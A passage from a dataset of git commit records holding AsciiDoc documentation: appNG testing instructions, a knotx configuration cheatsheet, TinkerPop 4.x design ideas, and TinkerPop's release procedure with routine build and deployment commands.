You can test with or without JPA support enabled.\n\nWithout JPA support:\n[source,java]\n----\n@org.springframework.test.context.ContextConfiguration(initializers = MyTest.class)\npublic class EmployeesTest extends TestBase {\n\n public MyTest() {\n super(\"myapp\", \"application-home\");\n }\n \n}\n----\n\nWith JPA support:\n[source,java]\n----\n@org.springframework.test.context.ContextConfiguration(\n locations = { TestBase.TESTCONTEXT_JPA }, initializers = MyTest.class)\npublic class EmployeesTest extends TestBase {\n\n public MyTest() {\n super(\"myapp\", \"application-home\");\n setEntityPackage(\"com.myapp.domain\");\n setRepositoryBase(\"com.myapp.repository\");\n }\n \n}\n----\n\n=== Testing a datasource:\n[source,java]\n----\n@org.junit.Test\npublic void testShowEmployees() throws ProcessingException, IOException {\n\taddParameter(\"selectedId\", \"1\"); \/\/ <!--1-->\n\tinitParameters(); \/\/ <!--2-->\n\tDataSourceCall dataSourceCall = getDataSource(\"employees\");\/\/ <!--3-->\n\tCallableDataSource callableDataSource = dataSourceCall.getCallableDataSource(); \/\/ <!--4-->\n\tcallableDataSource.perform(\"aPage\"); \/\/ <!--5-->\n\tvalidate(callableDataSource.getDatasource());\/\/ <!--6-->\n}\n----\n<1> adds a parameter\n<2> initialize the parameters, must be called after parameters have been added\n<3> retrieve a `DataSourceCall` representing the datasource by its id\n<4> get a `CallableDataSource`\n<5> perform the `CallableDataSource`\n<6> validate the response\n\nIn step 6, a {appng}\/org\/appng\/testsupport\/validation\/WritingXmlValidator.html[org.appng.testsupport.validation.WritingXmlValidator^] is used to compare the contents of a *control file* with the XML that results from marshalling the given object (in this case a `org.appng.xml.platform.Datasource`). The control file must be located at `src\/test\/resources\/xml`. It's name is derived from the name of the test class and the name of the test method. So in this example, it would be `EmployeesTest-testShowEmployees.xml`.\n\nNOTE: For initially creating and later updating your control files, just set `WritingXmlValidator.writeXml = true` and the control files will be written to `src\/test\/resources\/xml`. \n\n=== Testing an action:\n[source,java]\n----\n@org.junit.Test\npublic void testCreateEmployee() throws ProcessingException, IOException {\n\tActionCall action = getAction(\"employeeEvent\", \"create\");\/\/ <!--1-->\n\taction.withParam(FORM_ACTION, \"create\");\/\/ <!--2-->\n\tEmployee formBean = new Employee(\"John\", \"Doe\");\/\/ <!--3-->\n\tCallableAction callableAction = action.getCallableAction(formBean);\/\/ <!--4-->\n\tFieldProcessor fieldProcessor = callableAction.perform();\/\/ <!--5-->\n\tvalidate(fieldProcessor.getMessages(), \"-messages\");\/\/ <!--6-->\n\tvalidate(callableAction.getAction(), \"-action\");\/\/ <!--7-->\n}\n----\n<1> retrieve an `ActionCall` representing the action by its event-id and id\n<2> add required parameters to the action\n<3> create a form bean\n<4> retrieve a `CallableAction`\n<5> perform the `CallableAction` receive a `FieldProcessor`\n<6> use a `validate(...)`-method that takes a suffix as a parameter, validating the messages of the `fieldProcessor`\n<7> use the same validate method to validte the contents of the action\n\nNOTE: Although you pass the `formBean` as a whole to `ActionCall.getCallableAction(formBean)`, this `formBean` is being copied internally. 
This copy, which is passed to the `ActionProvider<T>`, will contain only those properties that are mapped and writable in the datasource used by the action.\n\n=== Adding custom bean definitions for testing\nYou can add custom bean definitons for your tests. For example, if you want to run a SQL script to initialize your test database, you could provide a file `beans-test-xml` located at `src\/test\/resources`.\n\n.beans-test.xml\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/jdbc\n\t\thttp:\/\/www.springframework.org\/schema\/jdbc\/spring-jdbc.xsd\n\t\thttp:\/\/www.springframework.org\/schema\/beans \n\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\t\n\t<jdbc:initialize-database enabled=\"true\" data-source=\"datasource\"><!--1-->\n\t\t<jdbc:script location=\"classpath:\/sql\/init-db.sql\" \/><!--2-->\n\t<\/jdbc:initialize-database>\n<\/beans>\n----\n<1> use `<jdbc:initialize-database>` and make a reference to the built in <<app-datasource, datasource>>\n<2> set the classpath location for the DDL script\n\nIn your testcase, you just need to add `beans-test.xml` to the `@ContextConfiguration`-annotation \n\n[source,java]\n----\n@ContextConfiguration(locations = { TestBase.TESTCONTEXT_JPA, \"classpath:\/beans-test.xml\" }\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"378df99d1b3cec143a00e6ce918aec64cb2f5322","subject":"Updated javadocs","message":"Updated javadocs\n","repos":"Cognifide\/knotx,Cognifide\/knotx","old_file":"knotx-knot\/knotx-knot-action\/src\/main\/asciidoc\/dataobjects.adoc","new_file":"knotx-knot\/knotx-knot-action\/src\/main\/asciidoc\/dataobjects.adoc","new_contents":"= Cheatsheets\n\n[[ActionKnotOptions]]\n== ActionKnotOptions\n\n++++\n Describes the Action Knot configuration options\n++++\n'''\n\n[cols=\">25%,^25%,50%\"]\n[frame=\"topbot\"]\n|===\n^|Name | Type ^| Description\n|[[adapters]]`adapters`|`Array of link:dataobjects.html#ActionSettings[ActionSettings]`|\n+++\nSets the adapters that will be responsible for communicating with external services in order to\n process the request.\n+++\n|[[address]]`address`|`String`|\n+++\nSets the EB address of the verticle\n+++\n|[[deliveryOptions]]`deliveryOptions`|`link:dataobjects.html#DeliveryOptions[DeliveryOptions]`|\n+++\nSets the Vert.x Event Bus Delivery Options\n+++\n|[[formIdentifierName]]`formIdentifierName`|`String`|\n+++\nSets the name of the hidden input tag which is added by Action Knot.\n+++\n|===\n\n[[ActionSettings]]\n== ActionSettings\n\n++++\n Describes the physical details of an HTTP service endpoint that consumes form submissions\n from AdapterServiceKnot.\n++++\n'''\n\n[cols=\">25%,^25%,50%\"]\n[frame=\"topbot\"]\n|===\n^|Name | Type ^| Description\n|[[address]]`address`|`String`|\n+++\nSets the EB address of the service adapter\n+++\n|[[allowedRequestHeaders]]`allowedRequestHeaders`|`Array of String`|\n+++\nSets the list of HTTP client request headers that are allowed to be passed to Adapter. No request headers are allowed if not set.\n+++\n|[[allowedResponseHeaders]]`allowedResponseHeaders`|`Array of String`|\n+++\nSets the list of HTTP response headers that are allowed to be sent in a client response. 
No response headers are allowed if not set.\n+++\n|[[name]]`name`|`String`|\n+++\nSet the name of the service the will be used on html snippet level.\n+++\n|[[params]]`params`|`Json object`|\n+++\nSet the service parameters to be consumed by the adapter.\n+++\n|===\n\n","old_contents":"= Cheatsheets\n\n[[ActionKnotOptions]]\n== ActionKnotOptions\n\n++++\n Describes an Action Knot configuration options\n++++\n'''\n\n[cols=\">25%,^25%,50%\"]\n[frame=\"topbot\"]\n|===\n^|Name | Type ^| Description\n|[[adapters]]`adapters`|`Array of link:dataobjects.html#ActionSettings[ActionSettings]`|\n+++\n\nConfigures the available ActionAdapters to be used by the knot\nSets the adapters that will be responsible for communicating with external services in order to\n process the request.\n+++\n|[[address]]`address`|`String`|\n+++\nSets the EB address of the verticle\n+++\n|[[deliveryOptions]]`deliveryOptions`|`link:dataobjects.html#DeliveryOptions[DeliveryOptions]`|\n+++\nSets the Vert.x Event Bus Delivery Options\nSets the value of the 'name' attribute of the <code><form><\/code> tag.\n If not set, a default value is <code>_frmId<\/code>\nSets the name of the hidden input tag which is added by Action Knot.\n+++\n|===\n\n[[ActionSettings]]\n== ActionSettings\n\n++++\n Describes a physical details of HTTP service endpoint that consumes form submitions\n from AdapterServiceKnot.\n++++\n'''\n\n[cols=\">25%,^25%,50%\"]\n[frame=\"topbot\"]\n|===\n^|Name | Type ^| Description\n|[[address]]`address`|`String`|\n+++\nSets the EB address of the service adapter\n+++\n|[[allowedRequestHeaders]]`allowedRequestHeaders`|`Array of String`|\n+++\nSets list of HTTP client request headers that are allowed to be passed to Adapter. No request headers are allowed if not set.\n+++\n|[[allowedResponseHeaders]]`allowedResponseHeaders`|`Array of String`|\n+++\nSets list of HTTP response headers that are allowed to be sent in a client response. No response headers are allowed if not set.\n+++\n|[[name]]`name`|`String`|\n+++\nSet the name of the service the will be used on html snippet level.\n+++\n|[[params]]`params`|`Json object`|\n+++\nSet the service parameters to be consumed by the adapter.\n+++\n|===\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb8facfd35adf5cb18fd761d7610e455a9bbfea3","subject":"Added TINKERPOP-1417 to the future dev doc CTR","message":"Added TINKERPOP-1417 to the future dev doc CTR\n","repos":"apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop","old_file":"docs\/src\/dev\/future\/index.asciidoc","new_file":"docs\/src\/dev\/future\/index.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. 
See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nimage::apache-tinkerpop-logo.png[width=500,link=\"http:\/\/tinkerpop.apache.org\"]\n\n*4.0.0*\n\n:toc-position: left\n\n= TinkerPop 4.x Design Ideas\n\nTinkerPop 4.x is not a version considered on the immediate horizon, but there are often points in the day to day\ndevelopment of TinkerPop 3.x where there are changes of importance, novelty and usefulness that are so big that they\ncould only be implemented under a major new version. This document is meant to track these concepts as they develop,\nso that at some point in the future they can be referenced in a single place.\n\nThere is no particular layout or style to this document. Simple bullet points, open questions posed as single\nsentences, or fully structured document headers and content are all acceptable. The main point is to capture ideas\nfor future consideration when 4.x becomes the agenda of the day for The TinkerPop.\n\nimage:tp4-think.png[]\n\n== The Main Features\n\nTinkerPop4 should focus on the most successful aspects of TinkerPop3 and it should avoid the traps realized in TinkerPop3.\nThese items include:\n\n* The concept of Gremlin as both a virtual machine and language.\n** A standard bytecode specification should be provided.\n** A standard machine architecture should be provided.\n* The concept of Gremlin language variants.\n** It should be easy to create Gremlin variants in every major programming language.\n** A standard template should be followed for all languages.\n** Apache TinkerPop should provide variants in all major programming languages.\n* The concept of `Traversal` as the sole means of interacting with the graph.\n** The role of Blueprints should be significantly reduced.\n** The role of Gremlin should be significantly increased.\n\n== Hiding Blueprints\n\nOriginally from the link:https:\/\/lists.apache.org\/thread.html\/b4d80072ad36849b4e9cd3308f87115660574e3e7a4abb7ee68e959b@%3Cdev.tinkerpop.apache.org%3E[mailing list]:\n\nThroughout our documentation we show uses of the \u201cBlueprints API\u201d (i.e. Graph\/Vertex\/Edge\/etc. classes & methods) as\nwell as the use of the Traversal API (i.e. Gremlin).\n\nEnabling users to have two ways of interacting with the graph system has its problems:\n\n1. The DetachedXXX problem \u2014 how much data should a returned vertex\/edge\/etc. have associated with it?\n2. `graph.addVertex()` and `g.addV()` \u2014 which should I use? The first is faster but is not recommended.\n3. `SubgraphStrategy` leaking \u2014 I get subgraphs with Gremlin, but can then directly interact with the vertex objects to see more than I should.\n4. `VertexProgram` model \u2014 I write traversals with Traversal API, but then develop VertexPrograms with the Blueprints API. That\u2019s weird.\n5. GremlinServer returning fat objects \u2014 Serializers are creating property-rich vertices and edges. 
The awkward HaltedTraversalStrategy solution.\n6. \u2026 various permutations of these source problems.\n\nIn TinkerPop4 the solution might be as follows:\n\nThere should be two \u201cGraph APIs.\u201d\n\n1. Provider Graph API: This is the current Blueprints API with `Graph.addVertex()`, `Vertex.edges()`, `Edge.inVertex()`, etc.\n2. User Graph API: This is a ReferenceXXX API.\n\nThe first API is well known, but the second bears further discussion. `ReferenceGraph` is simply a reference\/dummy\/proxy\nto the provider Graph API. `ReferenceGraph` has the following API:\n\n* `ReferenceGraph.open()`\n* `ReferenceGraph.close()`\n* `ReferenceGraph.tx()` \/\/ assuming we like the current transaction model (??)\n* `ReferenceGraph.traversal()`\n\nThat is it. What does this entail? Assume the following traversal:\n\n[source,java]\n----\ng = ReferenceGraph.open(config).traversal()\ng.V(1).out(\u2018knows\u2019)\n----\n\n`ReferenceGraph` is almost like a `RemoteGraph` (`RemoteStrategy`) in that it makes a connection (remote or inter-JVM)\nto the provider Graph API. When `g.V(1).out(\u2018knows\u2019)` executes, it is really sending the bytecode to the provider Graph\nfor execution (as specified by the config of `ReferenceGraph.open()`). Thus, once it hits the provider's graph,\n`ProviderVertex`, `ProviderEdge`, etc. are the objects being processed. However, what the traversal\u2019s `Iterator<Vertex>`\nreturns is `ReferenceVertex`! That is, it never returns `ProviderVertex`. In this way, regardless if the user is\ngoing \u201cover the wire\u201d or within the same JVM or against a different provider\u2019s graph database or from\nGremlin-Python\/C#\/etc., all the vertices are simply \u2018reference vertices\u2019 (id + label). This makes it so that users\nnever interact with the graph element objects themselves directly. They can ONLY interact with the graph via\ntraversals! At most they can `ReferenceVertex.id()` and `ReferenceVertex.label()`. That's it \u2014 no mutations, no\nwalking edges, nada! And moreover, since ReferenceXXX has enough information to re-attach to the source graph, they\ncan always do the following to get more information:\n\n[source,java]\n----\nv = g.V(1).out(\u2018knows\u2019).next()\ng.V(v).values(\u2018name\u2019)\n----\n\nThis split into two Graph APIs will enable us to make a hard boundary between what the provider (vendor) needs to\nimplement and what the user (developer) gets to access.\n\n=== Comments\n\nThere is a question mark next to `ReferenceGraph.tx()` - Transactions are a bit of an open question for future versions\nof TinkerPop and likely deserve their own section in this document. The model used for the last three versions of TinkerPop\nis now rooted in the Neo4j approach to transactions and is often more trouble than it should be for us and providers.\nDistributed transactions are a challenge and don't apply to every provider. Transactions are further complicated by\nGLVs. The idea of local subgraphs for mutations and transaction management might be good but that goes against having\njust `ReferenceGraph`.\n\n== Gremlin Language Subset\n\nOn link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1417[TINKERPOP-1417], it was suggested that we \"Create a\nGremlin language subset that is easy to implement on any VM\". Implementing the Gremlin VM in another language is\npretty straightforward. However, it's a lot of code: all those step implementations. One thing we could do to make\nit easy for database providers not on the JVM (e.g. 
ArangoDB and C) is to create \"Gremlito\" (Gremlin--). This language\nsubset wouldn't support side-effects, sacks, match, etc. Basically, just simple traversal steps and reducing barrier\nterminals.\n\nThus:\n\n* out, in, both, values, outE, inV, id, label, etc.\n* repeat\n* select, project\n* where, has, limit, range, is, dedup\n* path, simplePath, cyclicPath\n* groupCount, sum, group, count, max, min, etc. (reducing barriers)\n\n=== Comments\n\nThis has an interesting potential impact on GLVs because \"Little Gremlin\" could be implemented within them for\nclient-side traversals over remote subgraphs, where the subgraph is like a remote transaction. All graph mutations\nessentially build a subgraph which is merged into the primary graph. That subgraph is effectively the \"transaction\".\nBuild it locally then submit it remotely and have the server sort out the merging. It's perhaps the most natural way\nto load data. With \"Gremlito\" you then get the added power of being able to traverse a local subgraph.","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nimage::apache-tinkerpop-logo.png[width=500,link=\"http:\/\/tinkerpop.apache.org\"]\n\n*4.0.0*\n\n:toc-position: left\n\n= TinkerPop 4.x Design Ideas\n\nTinkerPop 4.x is not a version considered on the immediate horizon, but there are often points in the day to day\ndevelopment of TinkerPop 3.x where there are changes of importance, novelty and usefulness that are so big that they\ncould only be implemented under a major new version. This document is meant to track these concepts as they develop,\nso that at some point in the future they can be referenced in a single place.\n\nThere is no particular layout or style to this document. Simple bullet points, open questions posed as single\nsentences, or fully structured document headers and content are all acceptable. 
The main point is to capture ideas\nfor future consideration when 4.x becomes the agenda of the day for The TinkerPop.\n\nimage:tp4-think.png[]\n\n== The Main Features\n\nTinkerPop4 should focus on the most successful aspects of TinkerPop3 and it should avoid the traps realized in TinkerPop3.\nThese items include:\n\n* The concept of Gremlin as both a virtual machine and language.\n** A standard bytecode specification should be provided.\n** A standard machine architecture should be provided.\n* The concept of Gremlin language variants.\n** It should be easy to create Gremlin variants in every major programming language.\n** A standard template should be followed for all languages.\n** Apache TinkerPop should provide variants in all major programming languges.\n* The concept of `Traversal` as the sole means of interacting with the graph.\n** The role of Blueprints should be significantly reduced.\n** The role of Gremlin should be significantly increased.\n\n\n== Hiding Blueprints\n\nOriginally from the link:https:\/\/lists.apache.org\/thread.html\/b4d80072ad36849b4e9cd3308f87115660574e3e7a4abb7ee68e959b@%3Cdev.tinkerpop.apache.org%3E[mailing list]:\n\nThroughout our documentation we show uses of the \u201cBlueprints API\u201d (i.e. Graph\/Vertex\/Edge\/etc. classes & methods) as\nwell as the use of the Traversal API (i.e. Gremlin).\n\nEnabling users to have two ways of interacting with the graph system has its problems:\n\n1. The DetachedXXX problem \u2014 how much data should a returned vertex\/edge\/etc. have associated with it?\n2. `graph.addVertex()` and `g.addV()` \u2014 which should I use? The first is faster but is not recommended.\n3. `SubgraphStrategy` leaking \u2014 I get subgraphs with Gremlin, but can then directly interact with the vertex objects to see more than I should.\n4. `VertexProgram` model \u2014 I write traversals with Traversal API, but then develop VertexPrograms with the Blueprints API. That\u2019s weird.\n5. GremlinServer returning fat objects \u2014 Serializers are created property-rich vertices and edges. The awkward HaltedTraversalStrategy solution.\n6. \u2026 various permutations of these source problems.\n\nIn TinkerPop4 the solution might be as follows:\n\nThere should be two \u201cGraph APIs.\u201d\n\n1. Provider Graph API: This is the current Blueprints API with `Graph.addVertex()`, `Vertex.edges()`, `Edge.inVertex()`, etc.\n2. User Graph API: This is a ReferenceXXX API.\n\nThe first API is well known, but the second bears further discussion. `ReferenceGraph` is simply a reference\/dummy\/proxy\nto the provider Graph API. `ReferenceGraph` has the following API:\n\n* `ReferenceGraph.open()`\n* `ReferenceGraph.close()`\n* `ReferenceGraph.tx()` \/\/ assuming we like the current transaction model (??)\n* `ReferenceGraph.traversal()`\n\nThat is it. What does this entail? Assume the following traversal:\n\n[source,java]\n----\ng = ReferenceGraph.open(config).traversal()\ng.V(1).out(\u2018knows\u2019)\n----\n\n`ReferenceGraph` is almost like a `RemoteGraph` (`RemoteStrategy`) in that it makes a connection (remote or inter-JVM)\nto the provider Graph API. When `g.V(1).out(\u2018knows\u2019)` executes, it is really sending the bytecode to the provider Graph\nfor execution (as specified by the config of `ReferenceGraph.open()`). Thus, once it hits the provider's graph,\n`ProviderVertex`, `ProviderEdge`, etc. are the objects being processed. However, what the traversal\u2019s `Iterator<Vertex>`\nreturns is `ReferenceVertex`! 
That is, it never returns `ProviderVertex`. In this way, regardless if the user is\ngoing \u201cover the wire\u201d or within the same JVM or against a different provider\u2019s graph database or from\nGremlin-Python\/C#\/etc., all the vertices are simply \u2018reference vertices\u2019 (id + label). This makes it so that users\nnever interact with the graph element objects themselves directly. They can ONLY interact with the graph via\ntraversals! At most they can `ReferenceVertex.id()` and `ReferenceVertex.label()`. Thats it, \u2014 no mutations, not\nwalking edges, nada! And moreover, since ReferenceXXX has enough information to re-attach to the source graph, they\ncan always do the following to get more information:\n\n[source,java]\n----\nv = g.V(1).out(\u2018knows\u2019).next()\ng.V(v).values(\u2018name\u2019)\n----\n\nThis split into two Graph APIs will enables us to make a hard boundary between what the provider (vendor) needs to\nimplement and what the user (developer) gets to access.\n\n=== Comments\n\nThere is a question mark next to `ReferenceGraph.tx()` - Transactions are a bit of an open question for future versions\nof TinkerPop and likely deserve their own section in this document. The model used for last three version of TinkerPop\nnow is rooted in the Neo4j approach to transactions and is often more trouble than it should be for us and providers.\nDistributed transactions are a challenge and don't apply to every provider. Transactions are further complicated by\nGLVs. The idea of local subgraphs for mutations and transaction management might be good but that goes against having\njust `ReferenceGraph`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a62b65594c4d7f717a0976732239367a6ab0b7fc","subject":"Added some more notes to release documents.","message":"Added some more notes to release documents.\n","repos":"apache\/incubator-tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,samiunn\/incubator-tinkerpop,newkek\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,BrynCooke\/incubator-tinkerpop,newkek\/incubator-tinkerpop,apache\/tinkerpop,newkek\/incubator-tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,BrynCooke\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,jorgebay\/tinkerpop","old_file":"docs\/src\/dev\/developer\/release.asciidoc","new_file":"docs\/src\/dev\/developer\/release.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. 
You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nRelease Process\n===============\n\nThis document describes the steps required to release a version of TinkerPop. The release is handled by a \"release\nmanager\" (a committer fulfills this role), who ensures that the steps in this document are executed. The process is\nmulti-phased and can therefore take several weeks to complete given the time needed for Apache voting and community\nfeedback. Once a release point has been identified, the following phases represent the flow of \"release\":\n\n* Pre-flight check.\n* Optionally, produce a release candidate for community feedback.\n* Submit the official release for PMC vote.\n* Release and promote.\n\nNOTE: It might be helpful to use this document as generated from the current release as opposed to one generated\nfrom a previous version or from a recent `SNAPSHOT`. When using one generated for release, all the \"versions\" in the\ncommands end up being set to the version that is being released, making cut and paste of those commands less labor\nintensive and error prone.\n\nPre-flight Check\n----------------\n\nThe \"pre-flight check\" is a list of things performed by the release manager during the weeks leading up to a scheduled\nday to release. These checks will help to ensure that the release day goes smoothly by identifying problems early\nand communicating with other members of the community.\n\n. Fourteen days before release, issue an email to the dev mailing list to remind the community of the pending release.\n.. Note any important issues open in JIRA in that post.\n.. Request review and update of the \"upgrade documentation\" and CHANGELOG.\n. Seven days before release, announce the code freeze on the dev mailing list to remind the community that the branch\nunder release is protected. Tweaks to documentation and other odds and ends related to release are still allowed\nduring this period.\n. At some point during the week:\n.. Run the full integration test suite: `mvn clean install -DskipIntegrationTests=false -DincludeNeo4j`\n.. Deploy a final SNAPSHOT to the snapshot repository.\n.. Review LICENSE and NOTICE files to make sure that no <<dependencies,changes are needed>>.\n.. Review javadoc filters on the \"Core API\" docs to be sure nothing needs to change.\n.. Review JIRA tickets in the release and ensure that:\n... All tickets are categorized by having a \"Component\" assigned.\n... All tickets are either of type \"Bug\" or \"Enhancement\".\n... All tickets where work was completed are \"Closed\"\n.... Search for \"closed the pull request\" in comments for hints on possible tickets that were left open by mistake.\n.... Look for tickets marked as \"Resolved\" (some users might not have rights to mark as \"Closed\") - convert these to \"Closed\".\n... All tickets not marked \"Fixed\", \"Done\", or \"Implemented\" for their Resolution should not have a Fix Version\nassigned (use common sense when reviewing these tickets before removing the Fix Version as it is possible the incorrect\nResolution may have been assigned).
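 One illustrative JQL filter for surfacing such tickets (the version is a placeholder; adjust as needed): `fixVersion = xx.yy.zz AND resolution not in (Fixed, Done, Implemented)`.\n. 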
When all documentation changes are in place, use `bin\/publish-docs.sh` to deploy a final `SNAPSHOT` representation\nof the docs and thus validate that there are no issues with the documentation generation process. Request review\nof the published documentation on the dev mailing list.\n\nRelease Candidate\n-----------------\n\nA release candidate is an unofficial release that is represented by a tagged version in the Git repository. It is\noffered in cases where there is significant change in a particular version and the potential for upgrades and problems\nmight be high.\n\n. `mvn clean install -DincludeNeo4j`\n.. `mvn verify -DskipIntegrationTests=false -DincludeNeo4j`\n.. `mvn verify -DskipPerformanceTests=false`\n. `bin\/publish-docs.sh <username>` - note that under a release candidate the documentation is published as SNAPSHOT\n. `mvn versions:set -DnewVersion=xx.yy.zz -DgenerateBackupPoms=false` to update the project files to reference a non-SNAPSHOT version\n. `git diff` and review the updated files (expect all `pom.xml` files and this README)\n. `git commit -a -m \"TinkerPop xx.yy.zz release\"` and `git push`\n. `git tag -a -m \"TinkerPop xx.yy.zz release\" xx.yy.zz` and `git push --tags`\n. `mvn clean install`\n. `mvn versions:set -DnewVersion=xx.yy.zz-SNAPSHOT -DgenerateBackupPoms=false` to go back to SNAPSHOT\n. `git commit -a -m \"Returned to xx.yy.zz-SNAPSHOT\"` and `git push`\n. Announce the release candidate to `dev` mailing list and await feedback\n. Repeat as required or proceed to the next phase\n\nPMC Vote\n--------\n\nA positive vote for a particular release from the TinkerPop PMC is required to move to the following phase.\n\n. By this point, the testing performed during the code freeze should have validated the release. If however there\nare additional tests to perform that the release manager feels are relevant, they should be performed now. In other\nwords, there is no need to rebuild the `SNAPSHOT` yet another time unless there are circumstances that would call its\nvalidity into question.\n. Update `CHANGELOG.asciidoc`:\n.. Update the release date\n.. Generate the JIRA release notes report for the current version and append them to the `CHANGELOG.asciidoc`.\n... Use an \"advanced\" search to filter out JIRA issues already released on other versions. For example: `fixVersion\n= 3.2.0 AND fixVersion not in (3.1.3, 3.1.2, 3.1.1, 3.1.0)`.\n... Consider use of an \"Excel\" export to organize, sort (by type and then id) and prepare the JIRA tickets to be pasted to `CHANGELOG.asciidoc`\n... Be sure to include a link to other versions in the `CHANGELOG.asciidoc` that were previously released while the\ncurrent release was under development as this new release will have those changes included within it. Please see\n3.2.1 for an example.\n.. Organize \"breaking\" changes to be clearly marked (use JIRA and the \"breaking\" label to identify those)\n. Update \"upgrade documentation\":\n.. Update the release date.\n.. Update the link to CHANGELOG.asciidoc\n. `mvn versions:set -DnewVersion=xx.yy.zz -DgenerateBackupPoms=false` to update project files to reference the non-SNAPSHOT version\n. `git diff` and review the updated files (expect all `pom.xml` files and this README)\n. `git commit -a -m \"TinkerPop xx.yy.zz release\"` and push\n. `mvn clean install` - need to build first so that the right version of the console is used with `bin\/publish-docs.sh`\n. 
`bin\/process-docs.sh` and validate the generated documentation locally (don't rely on \"SUCCESS\" - scroll up through logs to ensure there were no errors and view the HTML directly)\n. `bin\/publish-docs.sh <username>` - Note that this step requires no additional processing, as the previous step\nhandled document generation; this step merely needs to upload what was generated.\n. `mvn deploy -Papache-release -DcreateChecksum=true -DskipTests` - deploy signed artifacts with checksums to link:https:\/\/repository.apache.org\/[Apache Nexus]. Review (artifact versions, file sizes, anything that might be out of place - request another committer to review as well).\n. Review generated artifacts to be sure they have both javadocs and asciidocs present, then \"close\" the repo - if the repo is left open it will be automatically dropped after five days, while closing the repo will allow it to stay available for a full ninety days, which is more than enough time to complete a vote. Do NOT \"release\" the repository at this time.\n. Upload artifacts to `https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop` for `[VOTE]` review.\n.. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/ dev` and `mkdir dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/gremlin-console\/xx.yy.zz\/gremlin-console-xx.yy.zz-distribution.zip* dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/gremlin-server\/xx.yy.zz\/gremlin-server-xx.yy.zz-distribution.zip* dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/tinkerpop\/xx.yy.zz\/tinkerpop-xx.yy.zz-source-release.zip* dev\/xx.yy.zz`\n.. `cd dev\/xx.yy.zz`\n.. pass:[<code>ls * | xargs -n1 -I {} echo \"mv apache-{} {}\" | sed -e 's\/distribution\/bin\/' -e 's\/source-release\/src\/' -e s'\/^\\(.*\\) \\(.*\\) \\(.*\\)$\/\\1 \\3 \\2\/' | 